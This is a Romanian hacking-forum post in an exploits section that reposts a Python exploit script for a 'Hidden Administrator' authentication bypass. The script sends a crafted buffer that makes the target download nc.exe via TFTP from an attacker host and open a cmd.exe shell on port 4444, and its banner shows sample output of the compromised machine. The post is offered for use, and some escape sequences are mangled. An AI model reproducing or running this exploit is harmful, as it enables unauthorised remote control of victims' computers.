Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
doryna_2223
Femeie
25 ani
Mehedinti
cauta Barbat
25 - 80 ani
Hacking and more... / Exploituri si POCs / Hidden Administrator Authenticaiton Bypass Exploit Moderat de Shocker
Autor
Mesaj Pagini: 1
Ras
Little Kevin

Inregistrat: acum 17 ani
Postari: 45


Code:

####################################################################################
#           Hidden Administrator Authenticaiton Bypass Exploit                     #
#                   ahmed[at]rewterz.com                                           #
#            http://www.securityfocus.com/bid/24049                                #
#                                                                                  #
# C:>python rewt-ha-exp.py                                                        #
# Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip>                #
# make sure nc.exe exists on tftpd server                                          #
#                                                                                  #
# C:>telnet 192.168.1.4 4444                                                      #
# C:>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105                #
# [+] Connecting to 192.168.1.4                                                    #
# [+] Uploading Files                                                              #
# [+] DONE [+]                                                                     #
# [+] Now Connect to port 4444 on victim IP !!!                                    #
#                                                                                  #
# C:>telnet 192.168.1.4 4444                                                      #
# Mcft Windows XP [Version 5.1.2600]                                          #
# (C) Copyright 1985-2001 Mcft Corp.                                          #
# C:ha_server>                                                                    #
####################################################################################


import socket
import struct
import time
import sys
import getopt


def usage():
   print "n"
   print "######################################################"
   print "# Hidden Administrator Authentication Bypass Exploit #"
   print "#           Coded By ahmed[at]rewterz.com            #"
   print "######################################################"
   print "n"
   print "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0]
   print "make sure nc.exe exists on tftpd servern"

def exploit():
   h ="%X" % (130+len(tftpd))
        buff1='_file_manager_operations_copy_files_Loc_Rem_c:\^filernx0brewt_ha.bat'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
   buff1+='x00x00x00x00x00x00x00x00x00x00'
   buff1 += ('\x' + h).decode('string_escape')
   buff1 += 'x00x00x00x00x00x00x00'
   buff1+='x00tftp -i ' + tftpd + ' GET nc.exe c:\nc.exe                           '
   buff1+='rnc:\nc.exe -L -d -p 4444 -e cmd.exe                 rnrn         '
   buff1+='      rnrn_file_manager_operations_get_cur_dir_c:rn'
   try:
      print "[+] Connecting to %s" %host
           s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      connect=s.connect((host,int(port)))
      print "[+] Uploading Files"
      s.send(buff1)
           time.sleep(2)
           s.send('+run_C:\rewt_ha.bat|rn')
           time.sleep(1)
           print "[+] DONE [+]"
                print "[+] Now Connect to port 4444 on victim IP !!!"
   except:
      print "[+] Could not connect to the server"


if len(sys.argv)<7:
       usage()
       sys.exit()
try:
       options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0]
except getopt.GetoptError, err:
       print err
       usage()
       sys.exit()


for option, value in options:
       if option == '-h':
           host = value
       if option == '-p':
           port = int(value)
       if option == '-t':
           tftpd=value
exploit()



pus acum 16 ani
   
Pagini: 1  

Mergi la